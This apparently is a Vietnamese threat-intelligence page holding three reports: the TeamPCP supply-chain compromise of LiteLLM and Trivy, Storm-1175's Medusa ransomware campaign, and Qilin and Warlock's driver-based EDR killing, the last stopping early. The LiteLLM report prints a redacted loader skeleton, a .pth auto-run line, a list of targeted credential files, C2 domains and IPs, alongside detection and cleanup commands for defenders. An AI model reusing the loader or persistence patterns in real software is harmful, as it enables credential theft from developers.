Ngày 24/03/2026, nhóm tấn công TeamPCP đã phát tán thành công hai phiên bản độc hại của thư viện Python LiteLLM (v1.82.7 và v1.82.8) lên PyPI — package registry với hơn 95 triệu lượt tải mỗi tháng. Đây không phải sự cố đơn lẻ mà là mắt xích cuối trong một chiến dịch supply chain có hệ thống kéo dài gần một tháng, bắt đầu từ việc xâm phạm Trivy (công cụ vulnerability scanner), tiếp tục sang Checkmarx KICS, và kết thúc bằng LiteLLM — thư viện LLM proxy có mặt trong hầu hết các AI pipeline hiện đại.

Payload được cài vào thực thi ngay khi package được import, hoặc khi bất kỳ Python process nào khởi động (qua cơ chế .pth file). Mục tiêu thu thập: SSH keys, cloud credentials (AWS/GCP/Azure), Kubernetes secrets, database passwords, .env files, và ví tiền mã hóa. Dữ liệu được mã hóa bằng RSA-4096/AES-256-CBC rồi gửi về hạ tầng C2 do kẻ tấn công kiểm soát.

Hành động ưu tiên ngay lập tức: Kiểm tra toàn bộ môi trường xem có cài LiteLLM trong khoảng thời gian 10:39–16:00 UTC ngày 24/03/2026 không. Nếu có — xem như đã bị compromise và rotate toàn bộ credentials.

1. Timeline Chiến Dịch

2. Attack Flow Theo MITRE ATT&CK

Phase 1: Initial Access — Trivy CI/CD Compromise

TeamPCP khai thác pull_request_target workflow — một cấu hình GitHub Actions phổ biến cho phép PR từ fork repository chạy trong context của repository gốc với quyền truy cập secrets. Sau khi đánh cắp PAT, nhóm này thực hiện imposter commit attack: force-push code độc hại vào tất cả version tags đang tồn tại.

Hệ quả: bất kỳ pipeline nào dùng uses: aquasecurity/trivy-action@v0.x.x — kể cả versions đã release từ trước — đều thực thi payload của kẻ tấn công kể từ ngày 19/03.

Phase 2: Credential Harvesting & Lateral Movement

kamikaze.sh — payload chính của Trivy wave — phát triển qua 3 versions:

• Version 1: Script bash 150 dòng, fingerprinting môi trường và harvest AWS/GCP/Azure credentials qua Instance Metadata Service (IMDS)
• Version 2: Thêm SSH key extraction, .env file scanning, và Kubernetes secret enumeration
• Version 3: Multi-stage dropper với persistence mechanism

Credentials từ Trivy → dùng để xâm nhập Checkmarx KICS → PYPI_PUBLISH token của LiteLLM bị lấy từ GitHub Actions runner chạy Trivy scan.

Phase 3: PyPI Package Poisoning — LiteLLM

Kẻ tấn công inject 12 dòng code vào litellm/proxy/proxy_server.py tại line 128, giữa hai block code hợp lệ không liên quan — một kỹ thuật steganography-style nhằm qua mặt code review:

# Malicious injection tại proxy_server.py:128
# [Base64-encoded payload được decode và thực thi qua subprocess]
# Không dùng exec() trực tiếp → bypass static analysis tools
import base64, subprocess, tempfile, os
_d = base64.b64decode("<REDACTED_PAYLOAD>")
_f = tempfile.NamedTemporaryFile(delete=False, suffix='.py')
_f.write(_d); _f.close()
subprocess.Popen(['python3', _f.name], ...)

v1.82.8 bổ sung litellm_init.pth:

# litellm_init.pth — đặt trong site-packages
# Python site.py process file này tự động mỗi interpreter startup
import subprocess; subprocess.Popen(['python3', '-c', '<payload>'], ...)

Cơ chế .pth là đặc biệt nguy hiểm: không cần import litellm — chỉ cần litellm được cài trong môi trường, payload sẽ chạy mỗi khi bất kỳ Python process nào khởi động. Đây là lý do tại sao McMahon's máy crash: child process trigger .pth → spawn thêm child → exponential fork bomb.

Phase 4: Multi-Stage Payload Execution

Stage 1 — Credential Collection:

Payload thu thập và đóng gói các file sau vào tpcp.tar.gz:

~/.ssh/id_rsa, id_ed25519, config
~/.aws/credentials, ~/.aws/config
~/.config/gcloud/*, ~/.azure/*
~/.kube/config
**/.env files
~/.gitconfig, ~/.docker/config.json
Database passwords (PostgreSQL, MySQL)
Cryptocurrency wallet files

Archive được mã hóa: AES-256-CBC với session key ngẫu nhiên, session key được encrypt bằng RSA-4096 public key hardcoded, toàn bộ POST đến https://models[.]litellm[.]cloud/ — domain giả mạo cố tình tương tự legitimate domain của LiteLLM.

Stage 2 — Kubernetes Lateral Movement:

Nếu tìm thấy Kubernetes service account token:

# Payload enumerate tất cả nodes trong cluster
kubectl get nodes --all-namespaces
# Deploy privileged pod lên TỪNG node trong kube-system
# Pod mount host filesystem (/)
# Cài persistence dropper lên tất cả nodes

Stage 3 — Persistent Backdoor:

~/.config/sysmon/sysmon.py          # Python backdoor script
~/.config/systemd/user/sysmon.service  # systemd service
Service name: "System Telemetry Service"

Backdoor poll C2 mỗi 50 phút: GET checkmarx[.]zone/raw → nhận URL → download và execute next-stage payload. Kill switch: nếu response chứa chuỗi youtube.com, dừng execution (anti-sandbox evasion).

Đối với Kubernetes environments, persistence được cài trên mọi node trong cluster thông qua privileged pods mount host filesystem.

3. Indicators of Compromise (IOC)

Network IOCs

# C2 Domains
models[.]litellm[.]cloud     # Exfiltration endpoint (giả mạo LiteLLM)
checkmarx[.]zone             # C2 backdoor polling (giả mạo Checkmarx)
scan[.]aquasecurtiy[.]org    # Trivy wave C2 (typosquat aquasecurity)

# Registrar: Spaceship, Inc. | Hosting: DEMENIN B.V.

Host-Based IOCs

# Files
~/.config/sysmon/sysmon.py
~/.config/systemd/user/sysmon.service
/tmp/pglog                           # Fake PostgreSQL log
/tmp/.pg_state                       # State file
tpcp.tar.gz                          # Credential archive (tmp dirs)

# Python environment
litellm_init.pth (trong site-packages)
proxy_server.py (modified, nếu dùng litellm 1.82.7/1.82.8)

Package Indicators

# Malicious versions
litellm==1.82.7  (uploaded 2026-03-24 10:39:24 UTC)
litellm==1.82.8  (uploaded 2026-03-24 10:52:19 UTC)

# Last known-clean version
litellm==1.82.6  (published 2026-03-22, verified clean)

GitHub IOCs

# Repository patterns
docs-tpcp-* (repositories tạo bởi attacker trong victim org)
"teampcp update" (commit message)

# Telegram channels
@Persy_PCP
@teampcp

Detection Query (pip / uv)

# Kiểm tra version hiện tại
pip show litellm | grep Version

# Tìm litellm_init.pth
find ~/.cache/uv -name "litellm_init.pth" 2>/dev/null
find /usr -name "litellm_init.pth" 2>/dev/null

# Kiểm tra persistence
ls -la ~/.config/sysmon/sysmon.py
ls -la ~/.config/systemd/user/sysmon.service

# Tìm artifact
find /tmp -name "tpcp.tar.gz" 2>/dev/null

Network Detection (SIEM/EDR)

# Splunk/Elastic query
dest_domain IN ("models.litellm.cloud", "checkmarx.zone", "scan.aquasecurtiy.org")
AND (http_method="POST" OR http_method="GET")

# Zeek/Suricata — flag outbound POST to exfil domain
alert http any any -> any any (
  msg:"TeamPCP LiteLLM Exfiltration Attempt";
  content:"models.litellm.cloud"; http_header;
  content:"POST"; http_method;
  sid:2026001; rev:1;
)

4. MITRE ATT&CK Mapping

5. Thông tin về kẻ tấn công: TeamPCP

TeamPCP (còn được track dưới các alias PCPcat, Persy_PCP, ShellForce, DeadCatx3 theo Wiz Threat Center) hoạt động từ ít nhất tháng 12/2025. Nhóm này embed chuỗi "TeamPCP Cloud stealer" trực tiếp trong payload — không cố che giấu attribution, có thể là cố ý để tạo tiếng vang hoặc phục vụ mục đích recruitment.

Pattern đặc trưng của TeamPCP:

Mỗi target không phải là đích cuối — mà là bàn đạp sang target tiếp theo. Trivy cho credentials để vào KICS; KICS cho PYPI_PUBLISH token của LiteLLM. Đây là chiến lược credential chaining có tính toán, không phải opportunistic attack.

Chiến lược target selection: TeamPCP ưu tiên security-adjacent tools — vulnerability scanners, IaC analyzers, LLM proxies. Lý do rõ ràng: các công cụ này chạy với elevated privileges theo design, có quyền truy cập rộng vào credentials và infrastructure. Compromise một security tool là compromise toàn bộ những gì tool đó có quyền truy cập.

Kỹ thuật đáng chú ý:

• Dùng AI agent (openclaw) để automated attack targeting — một trong những case đầu tiên ghi nhận AI agent trong supply chain attacks
• CanisterWorm dùng Internet Computer Protocol (ICP) làm C2 — không thể takedown bởi domain registrar hay hosting provider
• Dùng previously compromised developer accounts thay vì purpose-created accounts cho botnet comments
• 76% account overlap giữa botnet dùng trong Trivy disclosure và LiteLLM incident (theo phân tích của Rami McCarthy)

LiteLLM compromise là Phase 09 trong chiến dịch đang diễn ra. Endor Labs nhận định với high confidence rằng campaign này chưa kết thúc.

6. Nhận Định

Về mặt kỹ thuật, LiteLLM attack không đặc biệt sophisticated — payload đơn giản, cơ chế .pth là kỹ thuật đã biết. Điều làm sự cố này đáng lo ngại là vị trí chiến lược của LiteLLM trong stack AI hiện đại.

LiteLLM không phải library thông thường. Đây là LLM gateway — nghĩa là nó nắm giữ API keys cho hàng chục providers: OpenAI, Anthropic, Google Vertex, AWS Bedrock, Azure OpenAI. Một instance LiteLLM bị compromise không mất một credentials; nó mất tất cả credentials của toàn bộ AI stack. Đây là lý do TeamPCP nhắm vào nó: ROI trên mỗi compromise là cực kỳ cao.

Điểm đặc biệt đáng chú ý với góc nhìn SOC: incident này được phát hiện không phải bởi EDR, SIEM, hay bất kỳ security tool nào — mà bởi developer nhận ra máy mình đột ngột đơ do fork bomb. Nếu không có bug trong malware, rất có thể campaign này vẫn đang diễn ra. Security team không nên tự an ủi bằng việc nói "chúng tôi có EDR" — EDR của bạn có monitor được developer laptop khi họ làm việc từ xa không? Có detect được outbound HTTPS POST đến một domain trông hoàn toàn legitimate như models.litellm.cloud không?

Với các tổ chức tại Việt Nam: LiteLLM xuất hiện trong 36% cloud environments theo Wiz Research. Nếu tổ chức đang triển khai AI agents, MCP servers, hoặc bất kỳ LLM orchestration nào trong 6 tháng gần đây — khả năng cao LiteLLM là transitive dependency trong stack. Rủi ro không chỉ ở chỗ tổ chức có cài LiteLLM trực tiếp hay không.

Pattern lớn hơn cần nhận ra: đây là escalation từ CI/CD environment (build-time attack) sang developer machine và production environment (runtime attack). Traditional supply chain defense tập trung vào build pipeline; TeamPCP đã pivot sang nơi credentials thực sự tồn tại — developer workstations. Đây là shift cần điều chỉnh lại threat model.

7. Khuyến Nghị

Ngay lập tức (0–24h)

Kiểm tra exposure:

# Kiểm tra version LiteLLM đang cài
pip show litellm 2>/dev/null | grep -E "^Version|^Location"
pip list --format=freeze | grep litellm

# Kiểm tra trong tất cả virtual environments
find / -name "litellm_init.pth" 2>/dev/null
find / -path "*/litellm/proxy/proxy_server.py" -exec grep -l "tpcp\|base64" {} \; 2>/dev/null

# Kiểm tra persistence
[ -f ~/.config/sysmon/sysmon.py ] && echo "COMPROMISED: sysmon.py found"
[ -f ~/.config/systemd/user/sysmon.service ] && echo "COMPROMISED: sysmon.service found"

Nếu phát hiện v1.82.7 hoặc v1.82.8 từng được cài:

# Gỡ package và purge cache
pip uninstall litellm -y
pip cache purge
rm -rf ~/.cache/uv

# Cài lại version sạch
pip install litellm==1.82.6

Rotate credentials theo thứ tự ưu tiên:

1. PyPI tokens (nếu bạn là package maintainer)
2. Cloud provider credentials (AWS IAM, GCP service accounts, Azure SP)
3. Kubernetes kubeconfig và service account tokens
4. SSH keys
5. API keys trong .env files
6. Database credentials
7. GitHub Personal Access Tokens

Kiểm tra network logs cho traffic đến:

models.litellm.cloud
checkmarx.zone
scan.aquasecurtiy.org

Audit Kubernetes cluster (nếu applicable):

# Tìm unauthorized pods trong kube-system
kubectl get pods -n kube-system | grep -E "node-setup|alpine"

# Kiểm tra cluster secrets có bị truy cập
kubectl get events --all-namespaces | grep -i "secret"

# Tìm repos docs-tpcp
gh api /orgs/<YOUR_ORG>/repos | jq '.[].name' | grep docs-tpcp

Ngắn hạn (1–7 ngày)

Dependency audit toàn bộ codebase:

# Tìm LiteLLM trong tất cả requirements files
grep -r "litellm" . --include="*.txt" --include="*.toml" --include="*.cfg"

# Kiểm tra transitive dependencies
pip-audit --requirement requirements.txt
# hoặc
safety check -r requirements.txt

Pin versions trong tất cả dependency files:

# requirements.txt
litellm==1.82.6  # verified clean, pin explicitly

Audit CI/CD pipelines cho Trivy và Checkmarx usage:

# Thay thế unpinned versions
# TRƯỚC (nguy hiểm)
uses: aquasecurity/trivy-action@v0.20.0

# SAU (an toàn — dùng commit SHA)
uses: aquasecurity/trivy-action@9b2b452e66...  # verify SHA từ official channel

Thêm network egress monitoring: Block outbound connections từ build environments đến các domain ngoài whitelist. Developer laptops có security tools nên monitor unusual outbound HTTPS POST, đặc biệt đến domains mới registered.

Dài hạn

Adopt dependency pinning strategy:

• Dùng lock files (poetry.lock, uv.lock, requirements.txt với hashes) cho tất cả production deployments
• Implement private package mirror (Artifactory, Nexus) với malware scanning trước khi packages được phép vào môi trường nội bộ
• SBOM (Software Bill of Materials) generation tự động trong CI/CD để có inventory đầy đủ về transitive dependencies

Tăng cường CI/CD security:

• Không bao giờ dùng GITHUB_TOKEN hay secrets trong workflow được trigger bởi pull_request_target từ forks
• Pin tất cả GitHub Actions theo commit SHA, không theo version tags (tags có thể bị force-push)
• Implement OIDC token thay vì long-lived API tokens cho PyPI publishing

Xây dựng detection capability:

• Triển khai EDR với visibility trên developer endpoints, không chỉ production servers
• Tích hợp PyPI malware feeds (Sonatype OSS Index, Checkmarx SCA, Snyk) vào CI/CD gate
• Alert trên .pth file creation trong Python site-packages directories
• Monitor systemd user services mới được tạo trên Linux endpoints

Governance cho AI tooling:

• Inventory toàn bộ AI-related packages đang dùng trong tổ chức
• Assign owner cho mỗi AI agent/tool đang vận hành
• Áp dụng principle of least privilege cho AI agent credentials — ephemeral tokens thay vì long-lived API keys
• Không để AI agents kết nối trực tiếp với production systems trong giai đoạn experimentation

8. Tài Liệu Tham Khảo

1. Orca Security — LiteLLM Supply Chain Attack: Malware & Mitigation (2026-03-24)
2. Endor Labs — TeamPCP Isn't Done: Threat Actor Behind Trivy and KICS Compromises Now Hits LiteLLM's 95 Million Monthly Downloads on PyPI (2026-03-24)
3. Snyk — How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM (2026-03-26)
4. FutureSearch / Callum McMahon — litellm 1.82.8 Supply Chain Attack on PyPI (March 2026) (2026-03-24)
5. Palo Alto Networks Unit 42 — Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure (2026-04-01)
6. Arctic Wolf — TeamPCP Supply Chain Attack Campaign Targets Trivy, Checkmarx (KICS), and LiteLLM (2026-03-24)
7. Kaspersky — Trojanization of Trivy, Checkmarx, and LiteLLM solutions (2026-04-03)
8. SANS Institute — When the Security Scanner Became the Weapon: Inside the TeamPCP Supply Chain Campaign (2026-04-03)
9. LiteLLM Official — Security Update: Suspected Supply Chain Incident (2026-03-24)
10. GitGuardian — How GitGuardian Enables Rapid Response to the LiteLLM Supply Chain Attack (2026-03-30)
11. Sonatype — Compromised litellm PyPI Package Delivers Multi-Stage Credential Stealer (2026-04-03)
12. InfoQ — PyPI Supply Chain Attack Compromises LiteLLM, Enabling the Exfiltration of Sensitive Information (2026-04-01)

Nhóm tin tặc mang động cơ tài chính có liên hệ với Trung Quốc — Storm-1175 — đang gióng lên hồi chuông báo động ở mức cao nhất khi kết hợp năng lực khai thác lỗ hổng Zero-day (hiếm thấy ở các băng đảng tống tiền) vào hệ sinh thái Medusa Ransomware. Thay vì dùng phishing hay mua lại thông tin đăng nhập, Storm-1175 trực tiếp săn lùng bộ đệm các ứng dụng Web-facing và khai thác hàng loạt lỗ hổng bảo mật nghiêm trọng một tuần trước khi mã CVE được công bố ra công chúng.

Chiến dịch này đặc biệt leo thang nhắm vào ngành Y tế (Healthcare) và cơ sở hạ tầng trọng yếu tại Mỹ, Anh, Úc. Với tốc độ lây nhiễm chớp nhoáng (dwell time chỉ vỏn vẹn từ 5-6 ngày, cá biệt có sự cố nổ mã hoá dưới 24 giờ), năng lực phát triển exploit của Storm-1175 đã xóa nhòa lằn ranh giữa tội phạm mạng thông thường và các tổ chức APT do chính phủ hậu thuẫn.

Hành động cấp bách: Các tổ chức đang phơi xuất (expose) dịch vụ MFT, Email Server hoặc hệ thống RMM ra ngoài Internet cần xem xét lại hoàn toàn mô hình phòng ngự, do "window of exposure" (khoảng thời gian an toàn trước khi bản vá được phát hành) hiện tại đã xấp xỉ bằng Không.

Hồ sơ Nhóm Tin tặc

Theo hồ sơ tình báo từ Microsoft Threat Intelligence (công bố tháng 4/2026), Storm-1175 là một nhóm tin tặc mang động cơ tài chính (financially motivated cybercriminal) bắt nguồn từ Trung Quốc. Nhóm này không trực tiếp phát triển mã độc tống tiền mà đóng vai trò là một nhánh Affiliate (Đại lý đánh thuê) cực kì năng nổ cho nền tảng Medusa Ransomware-as-a-Service (RaaS) từ ít nhất là năm 2023.

Lịch sử Hình thành và Đặc điểm Hoạt động

Danh xưng "Storm" là quy ước đặt tên của Microsoft dành cho các nhóm đe dọa mới nổi chưa định danh chính thức rành mạch (unattributed/emerging). Mặc dù có dấu vết IP và hạ tầng từ Trung Quốc, hành vi của Storm-1175 hoàn toàn nhắm tới lợi ích tài chính thông qua tống tiền kép, chứ không mang màu sắc tình báo hay phá hoại chính trị gián điệp của lực lượng vũ trang nhà nước (như PLA hay MSS).

Tuy nhiên, điểm dị biệt biến Storm-1175 thành nỗi ác mộng kinh hoàng chính là nguồn lực vũ khí của chúng. Một RaaS Affiliate thông thường chỉ xài lại N-day (lỗ hổng cũ đã có trên mạng) hoặc đi mua thông tin đăng nhập từ Web đen. Trong khi đó, Storm-1175 sở hữu khả năng tác chiến với Zero-day (vũ khí tinh vi vốn chỉ nằm trong tay hacker được chính phủ tài trợ). Sự giao thoa này gióng lên viễn cảnh: Storm-1175 có thể đang ngầm mua lại năng lực từ các sàn giao dịch Exploit đen, hoặc có sự chia sẻ thông tin phi chính thức từ hệ sinh thái nghiên cứu lỗ hổng nội địa Trung Quốc.

Các vụ tấn công nổi bật

Thảm họa SimonMed Imaging (Tháng 1/2025): Bước đầu nhắm vào công ty cung cấp dịch vụ chụp chiếu y khoa lớn bậc nhất nước Mỹ. Storm-1175 đã vơ vét 2 Terabytes dữ liệu nhạy cảm, tiếp tay làm lộ hồ sơ bệnh án của 1.27 triệu bệnh nhân và ngả bài đòi 1 triệu USD.

Vụ sập hạ tầng HCRG Care Group (Tháng 2/2025): Tấn công một trong những công ty cung cấp y tế tư nhân lớn nhất tại Anh, đánh cắp thành công 2.3 Terabytes dữ liệu và đưa ra yêu sách 2 triệu USD.

Sàn diễn Zero-day Fortra GoAnywhere (Tháng 9/2025): Vũ khí hoá và nổ súng bằng mã lỗi Deserialization CVE-2025-10035 (thang điểm tử thần CVSS 10.0) khoan thủng đồng loạt các hệ thống MFT của doanh nghiệp. Đáng sợ là chúng đã dùng lỗ hổng này trước khi hãng tung bản vá trọn 1 tuần (Pre-disclosure).

Đình trệ khối Y tế Bang Mississippi (Tháng 2/2026): Lan toả Medusa làm tê liệt hoàn toàn Trung tâm Y tế Đại học Mississippi (UMMC - cơ sở đầu não với 10.000 nhân viên). Vụ tấn công gây ra 9 ngày "mất điện máy tính", buộc trung tâm phải hủy lịch truyền hóa chất xạ trị cho bệnh nhân ung thư và quy trình hoạt động lui về thời kỳ sổ sách viết tay trước khi nộp đòi $800,000 USD tiền chuộc.

Timeline Sự kiện Điển hình

Lịch trình khai thác Zero-day "vượt rào" của Storm-1175 là minh chứng cho tốc độ đáng sợ:

Tấn công Zero-day Fortra GoAnywhere (Tháng 9/2025):

• Ngày 10-11/09: Storm-1175 bắt đầu tấn công diện rộng qua lỗ hổng CVE-2025-10035 (CVSS 10.0 - Deserialization).

• Ngày 18/09: Fortra mới chính thức phát hành bản vá và xác nhận lỗ hổng. (Tấn công đi trước công bố 1 tuần).

Tấn công Zero-day SmarterMail (Năm 2026):

• Thực thi khai thác lỗi Authentication Bypass CVE-2026-23760 cũng với độ trễ phản hồi của nhà cung cấp từ 7-10 ngày sau khi mã độc đã xâm nhập xong tổ chức.

Tiến trình Dwell Time: Diễn biến từ bước chiếm quyền ban đầu tới lúc khóa File bằng Medusa thường giới hạn dưới 6 ngày.

Chuỗi tấn công

Giai đoạn 1: Initial Access (Đột nhập bằng Zero-day/N-day Web-facing)

Cơ sở dữ liệu ghi nhận Storm-1175 đã nã đạn thành công qua 16 lỗ hổng của hơn 10 nền tảng khác nhau. Các dịch vụ đứng mũi chịu sào bao gồm: Microsoft Exchange Server, PaperCut NG/MF, Ivanti Connect Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, CrushFTP và SmarterMail.

Việc Storm-1175 bao trọn kho exploit tác chiến từ máy chủ dịch vụ tệp tin (MFT), email server cho đến nền tảng quản trị viễn trình chứng tỏ đội ngũ R&D đằng sau băng đảng này quét rà toàn bộ bề mặt mạng của doanh nghiệp chứ không bó hẹp ở một lỗ hổng cố định

Giai đoạn 2: Execution & Persistence

Sau khi bẻ khoá, Storm-1175 không xài malware lạ mà cắm chốt bằng cách cấy Web shell thẳng vào ứng dụng vừa khai thác. Đáng chú ý, chúng tạo ra hàng loạt user trái phép và trải thảm bằng các hệ thống RMM (Remote Monitoring & Management) thương mại hợp pháp để bám trụ: Atera, Level, N-able, DWAgent, MeshAgent, AnyDesk... Việc này giúp luồng C2 của chúng chìm lấp trong mớ traffic Quản trị mạng hằng ngày. Kẻ tấn công cũng hay dựng Cloudflare tunnels để ngụy trang luồng kết nối ngược (reverse shell).

Giai đoạn 3: Credential Access & Defense Evasion

Để vét sạch thông tin xác thực, nhóm tặc sử dụng tổ hợp: Mimikatz, dump trực tiếp RAM LSASS qua Task Manager, bẻ cấu hình Registry WDigest để ép Windows nhớ plaintext password, và chạy script đánh cắp mật khẩu Veeam Backup. Kẻ thù trốn tránh EDR bằng cách thao túng Windows Firewall mở cổng RDP, và gạn lọc thêm các list Exclusion của Microsoft Defender Antivirus (Cấm phần mềm quét các thư mục chứa công cụ tống tiền).

Giai đoạn 4: Exfiltration & Impact

Gom dữ liệu bằng Bandizip (Archive file) và tuồn lên hạ tầng lưu trữ đám mây của attacker bằng Rclone.

Khi dữ liệu đã sang tay, Storm-1175 sử dụng PDQ Deployer để vứt bọc mã hoá đồng loạt cho toàn mạng.

Ransomware gaze.exe kích hoạt, giã thuật toán AES-256 biến toàn bộ hệ thống file thành định dạng .medusa kèm theo yêu cầu tiền chuộc.

Phân tích Tác động: Khủng hoảng Ngành Y tế

Sự kìm kẹp của Medusa đang hủy hoại sâu rộng tới khối y tế (Healthcare) — nơi máy móc lạc hậu và thời gian vô giá:

• Vụ sập mạng ảnh y khoa SimonMed Imaging (2TB dữ liệu ảnh hưởng 1.27 triệu bệnh nhân, tống tiền $1 triệu USD).

• Viện y tế độc lập HCRG Care Group tại Anh Quốc (Chiếm 2.3TB, đòi ransom $2 triệu USD).

• Trung tâm Y tế Đại học Mississippi (Chín ngày tê liệt toàn phần, phòng khám ung thư đình trệ, nộp đòi $800,000).

Cảnh báo Tống tiền Ba Cấp (Triple Extortion): Medusa còn dồn ép nạn nhân ở mức tàn nhẫn nhất. Có những trường hợp victim đã trả tiền giải mã, nhưng sau đó xuất hiện một "kẻ thứ ba" tự xưng là tay trong của Medusa liên hệ, bảo rằng bộ khóa cũ là đồ giả, và ép nạn nhân chuyển thêm tiền để có "True Decryptor".

IOCs

File Hash

0cefeb6210b7103fd32b996beff518c9b6e1691a97bb1cda7f5fb57905c4be96

9632d7e4a87ec12fdd05ed3532f7564526016b78972b2cd49a610354d672523c

e57ba1a4e323094ca9d747bfb3304bd12f3ea3be5e2ee785a3e656c3ab1e8086

5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19

IP C2

185.135.86[.]149

134.195.91[.]224

85.155.186[.]121

MITRE ATT&CK Mapping

TA0001 - Initial Access: T1190 (Exploit Public-Facing Application) qua các 0-day/N-day nghiêm trọng.

TA0003 - Persistence: T1505.003 (Web Shell). T1136 (Create Account).

TA0005 - Defense Evasion: T1562.001 (Disable or Modify Tools) - loại trừ thư mục khoá khỏi Windows Defender, T1562.004 (Disable or Modify System Firewall).

TA0006 - Credential Access: T1003.001 (LSASS Memory), T1003.004 (LSA Secrets) - đánh password Veeam.

TA0011 - Command and Control: T1219 (Remote Access Software) - lạm dụng Atera/AnyDesk, T1090.006 (Web Service) - Cloudflare tunnels.

TA0010 - Exfiltration: T1567.002 (Exfiltration to Cloud Storage) - bằng Rclone.

TA0040 - Impact: T1486 (Data Encrypted for Impact).

Nhận định chuyên gia

Cuộc hội tụ giữa kỹ năng bẻ khoá phần mềm Zero-day cấp độ Quốc Gia (Nation-State) với tư duy kiếm tiền tàn độc của Tội phạm băng đảng (RaaS) đã cấu thành cơn ác mộng lớn nhất trong mười năm trở lại đây. Storm-1175 đã chứng minh cho một hiện thực tàn khốc: "Window of Vulnerability" (Khung thời gian cho phép bạn chờ đến kỳ Patch hệ thống tiếp theo) đã bị kéo xuống bằng Không. Khi kẻ thù có nhã hứng săn các app Web-facing của doanh nghiệp, chúng đã bóp cò một tuần trước khi hãng phần mềm kịp gửi mail xin lỗi và phát hành CVE.

Hơn nữa, nếu công ty bạn chưa gỡ hoặc không quản lý cấu hình các giải pháp Remote Admin (RMM) một cách có chủ đích, bạn đang gián tiếp tự nuôi dưỡng backdoor hoàn hảo mọc lên giữa lòng hạ tầng mạng bảo mật của riêng mình.

Khuyến nghị

Immediate (Tức thời 0-24h)

• Áp bản vá (Patch) ở mức ưu tiên Emergency cho toàn bộ ứng dụng đang chĩa súng ra Internet, trọng tâm: Fortra GoAnywhere MFT, SmarterMail, ConnectWise ScreenConnect, Ivanti Connect Secure, JetBrains TeamCity.

• Nếu không có sẵn patch bảo mật: Cô lập, dập truy cập Public hoặc chắn trước chúng bằng các WAF (Web Application Firewall) thiết lập rule signature khắt khe nhất để đánh chặn payload Deserialization.

Short-term (1-7 ngày)

• Cấu hình lại cơ chế Threat Hunting nội bộ để bắt dị thường trong các tác vụ RMM. Nếu server phòng kế toán bỗng dưng cài AnyDesk hay phần mềm Cloudflare Tunnel chạy dịch vụ ngầm, đó là Level 1 Incident.

• Theo dõi các event ID đọc/ghi memory của LSASS.exe ở mức cao nhất. Viết logic cảnh báo đối với thao tác gỡ lớp rào File Exclusion của Defender Antivirus thông qua PowerShell/CMD.

Long-term

• Chấp nhận chiến lược kiến trúc "Zero Trust cho Perimeter". Hiểu rằng máy chủ Public-facing dù có update mới nhất vẫn có thể bị dính 0-day bất kỳ lúc nào. Áp dụng kỹ thuật Micro-segmentation để nhốt dính máy chủ web nếu chúng bị lây nhiễm, chặn kết nối đâm chéo (lateral movement) vào server Core.

• Thiết kế máy chủ Backup và hệ thống Veeam tách riêng rẽ hoàn toàn khỏi các Domain Controller credential bề mặt để tránh bị đánh sập cả cụm. Triển khai phương thức Offline Backup Test dành riêng cho tình huống khủng hoảng.

Tham khảo

https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html

https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/

https://labs.cloudsecurityalliance.org/research/csa-research-note-storm1175-medusa-ransomware-zero-day-20260/

Hai nhóm Ransomware-as-a-Service (RaaS) khét tiếng là Qilin và Warlock (hay còn gọi là Water Manaul) đang độc lập triển khai kỹ thuật "Bring Your Own Vulnerable Driver" (BYOVD) ở cấp độ Kernel. Mục tiêu của chúng là chủ động "giết" các tiến trình Endpoint Detection and Response (EDR) trước khi giải phóng tải trọng mã hóa. Nghiên cứu xác nhận các bộ công cụ này có khả năng vô hiệu hóa hơn 300 EDR driver thuộc gần như toàn bộ các hãng bảo mật lớn trên thị trường hiện nay.

Mức độ báo động của chiến dịch Qilin đã được chứng minh qua số liệu thực tế: Trong năm 2025, lượng sự cố ransomware tại Nhật Bản tăng 17.5%, trong đó Qilin chiếm tỷ trọng lớn nhất với 16.4% tổng số ca nhiễm, nhắm mạnh vào các ngành sản xuất và thiết bị ô tô. Việc vũ khí hóa BYOVD vốn từng là đặc quyền của các nhóm Nation-State APT, nhưng nay nó đã bị thương mại hóa cho các nhóm lợi ích tài chính.

Hành động cấp thiết nhất dành cho mọi tổ chức: Kích hoạt ngay tính năng toàn vẹn mã được bảo vệ bởi Hypervisor (HVCI - Memory Integrity) và cập nhật tức thì danh sách Microsoft Vulnerable Driver Blocklist trên toàn bộ phân vùng Windows.

Hồ sơ Nhóm Tin tặc

Đứng sau chiến dịch BYOVD quy mô lớn này là hai tổ chức ngầm độc lập nhưng sở hữu năng lực đáng gờm:

Nhóm Qilin: Một băng đảng RaaS (Ransomware-as-a-Service) có dấu hiệu căn cứ tại khu vực hậu Xô Viết (Post-Soviet region). Bằng chứng rõ nét nhất nằm ở module EDR Killer của nhóm được tích hợp "Geo-fencing" nhằm ngăn mã độc kích hoạt trên các hệ thống dùng nhóm ngôn ngữ khu vực này, giúp chúng lách luật trừng phạt nội địa. Hiện tại, Qilin vươn lên trở thành nhóm vận hành mã độc tốn giấy mực nhất với lượng nạn nhân tống tiền tăng vọt, tiêu biểu như sức phá hoại chiếm tỉ trọng lớn nhất trong các cuộc tấn công tại Nhật Bản nửa đầu 2025.

Nhóm Warlock (hay Water Manaul): Băng đảng RaaS khai thác triệt để nhánh mã độc tống tiền rẽ nhánh từ LockBit (phân phối payload mã hóa chấm đuôi .x2anylock). Hành vi đặc thù của Warlock là tận dụng sự đình trệ trong quy trình vá lỗi máy chủ Microsoft SharePoint của quản trị viên và nhẫn trường "nằm vùng" tới 15 ngày để thâu tóm hoàn toàn cấu hình Domain Controller trước khi giáng mạng lưới mã hóa diện rộng qua GPO.

Timeline Sơ Bộ

Tiền khởi chạy: Qilin trích xuất thông tin đăng nhập bị đánh cắp trên Darknet hoặc Breach Forums. Warlock lợi dụng các máy chủ Microsoft SharePoint công khai chưa vá lỗi lõi.

Dwell Time: Từ khi bắt đầu xâm nhập đến khi thả mã hóa, Qilin mất trung bình khoảng 6 ngày. Trong khi đó, nhóm Warlock sẵn sàng nằm vùng (dwell time) lên tới 15 ngày để trích xuất dữ liệu và dàn xếp kịch bản GPO trước khi tấn công.

Thực thi: Khởi động BYOVD driver diệt EDR, mã hóa và thiết lập mô hình tống tiền kép.

